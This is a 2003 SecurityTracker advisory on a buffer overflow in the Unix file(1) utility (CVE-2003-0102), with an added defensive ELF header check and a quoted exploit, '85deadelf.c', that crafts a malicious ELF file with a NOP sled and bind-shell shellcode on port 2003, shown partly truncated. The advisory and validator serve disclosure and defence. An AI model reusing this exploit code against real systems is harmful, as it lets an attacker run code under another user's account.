


Category:   Application (Generic)  >   file
Vendors:   Darwin, Ian F.
(Exploit Code is Available) Re: 'file' Utility Buffer Overflow May Let Local Users Gain Elevated Privileges in Certain Cases
SecurityTracker Alert ID:  1006236
SecurityTracker URL:
CVE Reference:   CVE-2003-0102   (Links to External Site)
Date:  Mar 7 2003
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 3.39 and prior versions
Description:   A buffer overflow vulnerability was reported in file(1). A local user may be able to cause another local user to execute arbitrary code.

iDEFENSE reported that the flaw resides in a doshn() function call in the 'readelf.c' file. If a local user can get a target local user to invoke the file(1) command on a specially crafted malicious file, arbitrary code may be executed with the privileges of the target user.

Crazy Einstein has provided a demonstration exploit, available in the Source Message.
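
A defensive check for the boundary error described above, as an added example that is not part of the advisory and is not the vendor's 3.41 fix. It assumes, from the comments in the Source Message code, that the ELF header's e_phentsize and e_shentsize fields were used as read lengths, and it rejects ELF32 headers whose entry sizes differ from the fixed structure sizes; the function names and the sample header are constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* ELF32 layout constants from the ELF specification. */
#define EHDR32_SIZE 52  /* sizeof(Elf32_Ehdr) */
#define PHDR32_SIZE 32  /* sizeof(Elf32_Phdr) */
#define SHDR32_SIZE 40  /* sizeof(Elf32_Shdr) */

enum elf_check { ELF_OK, ELF_NOT_ELF32, ELF_BAD_PHENTSIZE, ELF_BAD_SHENTSIZE };

/* Read a 16-bit field in the byte order named by e_ident[EI_DATA]. */
static uint16_t rd16(const unsigned char *p, int big_endian) {
    return big_endian ? (uint16_t)(p[0] << 8 | p[1]) : (uint16_t)(p[1] << 8 | p[0]);
}

/* Validate the entry-size fields before any table entry is read into a
 * fixed-size struct. A size is only checked when its table has entries,
 * because headers without a table legitimately carry a size of 0. */
enum elf_check check_elf32_header(const unsigned char *buf, size_t len) {
    if (len < EHDR32_SIZE || memcmp(buf, "\x7f" "ELF", 4) != 0 || buf[4] != 1)
        return ELF_NOT_ELF32;                 /* short, bad magic, or not ELFCLASS32 */
    if (buf[5] != 1 && buf[5] != 2)
        return ELF_NOT_ELF32;                 /* unknown byte order */
    int be = (buf[5] == 2);
    uint16_t phentsize = rd16(buf + 42, be), phnum = rd16(buf + 44, be);
    uint16_t shentsize = rd16(buf + 46, be), shnum = rd16(buf + 48, be);
    if (phnum != 0 && phentsize != PHDR32_SIZE) return ELF_BAD_PHENTSIZE;
    if (shnum != 0 && shentsize != SHDR32_SIZE) return ELF_BAD_SHENTSIZE;
    return ELF_OK;
}

/* Constructed sample: a zeroed little-endian ELF32 header with one program
 * header and one section header of the given entry sizes. */
void make_sample(unsigned char out[EHDR32_SIZE], uint16_t phentsize, uint16_t shentsize) {
    memset(out, 0, EHDR32_SIZE);
    memcpy(out, "\x7f" "ELF\x01\x01\x01", 7);
    out[42] = phentsize & 0xff; out[43] = phentsize >> 8; out[44] = 1;
    out[46] = shentsize & 0xff; out[47] = shentsize >> 8; out[48] = 1;
}

int main(void) {
    unsigned char h[EHDR32_SIZE];
    make_sample(h, 0xfff, 0xfff);   /* entry sizes set by the code on this page */
    printf("oversized entry sizes: %d\n", check_elf32_header(h, sizeof h));
    make_sample(h, PHDR32_SIZE, SHDR32_SIZE);
    printf("well-formed header:    %d\n", check_elf32_header(h, sizeof h));
    return 0;
}
```

The same comparison can be run as a pre-filter on untrusted files before they reach an unpatched file(1).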

Impact:   A local user may be able to cause arbitrary code to be executed by a target user with the privileges of the target user.
Solution:   The vendor has released a fixed version (3.41), available at:

Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Mar 4 2003 'file' Utility Buffer Overflow May Let Local Users Gain Elevated Privileges in Certain Cases

 Source Message Contents

Subject:  file(1) exploit code

Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Just for fun... ;)

Content-Type: text/plain; name="85deadelf.c"
Content-Description: 85deadelf.c
Content-Disposition: inline; filename="85deadelf.c"

\   __________________
/   Black Sand Project
\   __________________
\   Created by CrZ [] LimpidByte [] /06.03.2003/
\   Bug discovered by iDEFENCE:
\   program name: DEADELF
\   description: Exploit for file program <= 3.39
\   info: program create file-exploit and when you 
/   make "file /path/to/this/file-exploit" shell
\   will open on 2003 port.
\   Usage: ./85deadelf <file-exploit> [return address]
\   Example of work:
\	[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
/	[crz@blacksand crz]$ ./85deadelf deadelf
\	[+] Creating a evil file deadelf!
/	[+] Using address of shellcode = 0xbfffbd40
\	[crz@blacksand crz]$ file deadelf
/	File: ASCII text
\	[crz@blacksand crz]$ telnet localhost 2003
/	Trying
\	Connected to blacksand (
/	Escape character is '^]'.
\	id;
/	uid=500(crz) gid=500(crz) groups=500(crz)
\	: command not found
/	exit;
\	Connection closed by foreign host.
/	[crz@blacksand crz]$
/   Tested against: file-3.37 (RedHat8.0)
\		    file-3.38 (RedHat8.0)

#include <fcntl.h>
#include <elf.h>
#include <stdio.h>

void usage(char *prog) {

	printf("\nCreated by CrZ [] Limpid Byte []\n");
	printf("Usage: %s <name of evil file> [return address]\n\n",prog);

int main(int argc, char **argv) {
\   a simple shellcode that show fake result of file program & bind
/   shell on 2003 port by CrZ
char shellcode[]=
	"\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text");*/
        /* bind shell on 2003 port */
	int fd,i;
	Elf32_Ehdr elfhdr;
	long xret=0xbfffbd40;
	char *evilfile="bl00mps";
	char tmp[100];
	if(!argv[1]) usage(argv[0]);
	else evilfile=argv[1];
	if(argv[2]) sscanf(argv[2],"0x%x",&xret);
	printf("[+] Creating a evil file %s!\n",evilfile);
	printf("[+] Using address of shellcode = 0x%x\n",xret);	

	bzero(&elfhdr,sizeof elfhdr );
	elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2)
	sprintf(elfhdr.e_ident,"\x7f\x45\x4c\x46\x01\x01\x01"); //ELF32 FORMAT
	elfhdr.e_phentsize=0xfff; //define size for read()
	elfhdr.e_phnum=1; //this is for stop for() loop when read()
	elfhdr.e_shentsize=0xfff; //define size for read()
	elfhdr.e_shnum=1; //this is for stop for() loop when read()
	for(i=0;i<20;i++) write(fd,&xret,4); //write new return address
	for(i=0;i<6000;i++) write(fd,"\x90",1); //write nops
	write(fd,&shellcode,sizeof shellcode); //write shellcode


	return 0;	


